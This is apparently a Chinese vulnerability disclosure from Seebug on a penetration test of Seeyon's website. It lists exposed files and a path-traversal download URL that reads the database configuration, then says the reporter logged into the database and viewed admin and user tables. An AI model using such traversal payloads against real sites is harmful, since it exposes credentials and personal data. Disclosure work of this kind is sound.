对北京致远协创软件有限公司官方网站的一次渗透性测试

### 简要描述： 能不能积极确认漏洞，别总忽略！还能不能玩耍了！O(∩_∩)O哈哈~ ### 详细说明： 由任意文件下载到读取数据库配置文件 查看伪静态文件 ``` http://www.seeyon.com/.htaccess ``` phpinfo ``` http://www.seeyon.com/phpinfo.php ``` 物理路径泄露 ``` http://www.seeyon.com/inc/db.php ``` ### 漏洞证明： 任意文件下载读取数据库配置文件 ``` http://www.seeyon.com/downfile.php?file=/../inc/conn.php ``` [<img src="https://images.seebug.org/upload/201504/03132256b0a456819b7b6f11c38f970977cee76f.png" alt="see.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/03132256b0a456819b7b6f11c38f970977cee76f.png) seeyon用户允许远程连接，利用navicat链接，成功控制数据库 [<img src="https://images.seebug.org/upload/201504/03132537f34ef2208cd6f03b186cb6477a4fca0a.png" alt="see.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/03132537f34ef2208cd6f03b186cb6477a4fca0a.png) 或者使用seeyon自带的phpmyadmin [<img src="https://images.seebug.org/upload/201504/03134256deaa0820da11828f896598bd6e5e8348.png" alt="see.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/03134256deaa0820da11828f896598bd6e5e8348.png) 可查看管理表、用户表、招聘表内容 放假了，没时间继续深入了，就做到这里吧。 对了别忘记确认漏洞！